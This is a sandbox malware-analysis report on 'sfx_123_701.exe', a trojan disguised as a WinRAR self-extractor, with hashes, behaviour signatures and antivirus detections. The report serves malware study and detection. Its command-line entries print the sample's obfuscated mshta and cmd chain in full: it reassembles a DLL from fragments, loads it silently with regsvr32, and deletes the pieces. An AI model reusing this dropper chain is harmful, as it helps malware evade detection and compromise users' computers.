Summary | ZeroBOX

sfx_123_701.exe

Downloader HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Hijack Network Http API persistence FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential OS Processor Check AntiDebug PE File DLL AntiVM PE32
Category Machine Started Completed
FILE s1_win7_x6402 June 24, 2021, 7:05 p.m. June 24, 2021, 7:09 p.m.
Size 1.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c8d1263386f7cb98ca1795ba2558a443
SHA256 a56fd1905d2af8a3a945ca699d94a4e1dff1759c719284af3ca975e47d150be5
CRC32 A6461225
ssdeep 49152:NsrFa7LUfPSDdjfoaanX3Kv24Dpdj0JK3iKrSbc1Qwf:urg7LaSxDjjv2SdguiKrHQwf
PDB Path D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
172.217.25.14 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The process "sfx_123_701.exe" with PID 3204 has been terminated.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The process cannot access the file because it is being used by another process.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 5DNzNJQ.S
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C5sPli.Uos
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: VpRQ5t.Th
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: IldCx.km
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: I5GP.~f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: i3Ip.U
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: GH57xj.FI
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 4wI_.RJj
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0
pdb_path D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
resource name PNG
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 6116
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02252000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6460
region_size: 1400832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6460
region_size: 1400832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x2d0f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6460
region_size: 696320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b80000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6460
region_size: 704512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00e50000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 6460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\p10.EXE
cmdline cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline msHTa vBscRiPT: ClOsE ( creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 & stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " , 0 , TrUe ) )
cmdline CmD.ExE /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 & stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
cmdline "C:\Windows\System32\cmd.exe" /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 & stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
cmdline msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline C:\Windows\system32\cmd.exe /S /D /c" EcHO "
cmdline C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5DNzNJQ.S"
cmdline regsvr32 -S ..\0BSXD.7 -u
cmdline "C:\Windows\System32\mshta.exe" vBscRiPT: ClOsE ( creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 & stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " , 0 , TrUe ) )
cmdline cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
file C:\Users\test22\AppData\Local\Temp\0BSXD.7
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sfx_123_701.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cMD.exE
parameters: /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
filepath: cMD.exE
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cMD.exE
parameters: /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
filepath: cMD.exE
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: CmD.ExE
parameters: /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 & stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
filepath: CmD.ExE
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Steal credential rule local_credential_Steal
description Take ScreenShot rule ScreenShot
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Hijack network configuration rule Hijack_Network
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000001
process_identifier: 3204
process_handle: 0x00000184
0 0

NtTerminateProcess

status_code: 0x00000001
process_identifier: 3204
process_handle: 0x00000184
1 0 0
cmdline cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline taskkill /F /iM "sfx_123_701.exe"
cmdline msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ( "WsCRIpt.SHELl" ). RUn ( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
host 172.217.25.14
Process injection Process 9076 resumed a thread in remote process 6116
Process injection Process 6116 resumed a thread in remote process 4404
Process injection Process 2600 resumed a thread in remote process 6460
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 6116
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 4404
1 0 0

NtResumeThread

thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 6460
1 0 0
Bkav W32.AIDetect.malware1
Cynet Malicious (score: 100)
FireEye Generic.mg.c8d1263386f7cb98
AegisLab Trojan.Multi.Generic.4!c
Sangfor Trojan.Win32.Save.a
BitDefender Trojan.GenericKD.46534066
CrowdStrike win/malicious_confidence_70% (W)
Symantec Trojan.Gen.2
APEX Malicious
Kaspersky Trojan.Win32.Qshell.ffg
MicroWorld-eScan Trojan.GenericKD.46534066
SentinelOne Static AI - Suspicious PE
GData Trojan.GenericKD.46534066
MAX malware (ai score=83)
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Microsoft Trojan:Win32/Bunitucrypt.RW!MTB
McAfee Artemis!C8D1263386F7
Cylance Unsafe
Zoner Probably Heur.RARAutorun
Webroot W32.Trojan.Gen